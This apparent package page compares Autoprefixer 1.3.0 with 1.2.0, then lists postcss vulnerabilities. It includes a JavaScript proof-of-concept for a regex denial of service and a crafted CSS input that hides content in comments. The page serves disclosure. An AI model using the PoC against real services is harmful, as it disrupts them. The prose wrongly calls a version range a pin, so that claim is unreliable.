Autoprefixer version 1.3.0 introduces some subtle but important updates compared to its predecessor, version 1.2.0. Both versions serve the primary function of parsing CSS and automatically adding vendor prefixes, ensuring compatibility across different web browsers by referencing data from the "Can I Use" website. A key difference lies in the caniuse-db dependency. Version 1.3.0 specifically relies on caniuse-db version "1.0.20140618 - 2", pinning it to a precise date, while version 1.2.0 uses a tilde range ~1.0, allowing for minor updates within the 1.0 version family. This pinpointed versioning in 1.3.0 suggests a fix or specific feature relying on a particular caniuse-db state. Browserify also saw a minor version upgrade from 4.1.9 to 4.1.11, potentially including bug fixes or performance enhancements relevant for developers using Autoprefixer within browserified projects. The development dependencies generally remain consistent offering a familiar testing environment to those contributing or customizing the package. Ultimately, developers should consider 1.3.0 if they need the stability of a particular caniuse-db or are using Browserify and benefit from its improvements, while being aware of the specific features or fixes introduced in the associated database version.
All the vulnerabilities related to the version 1.3.0 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.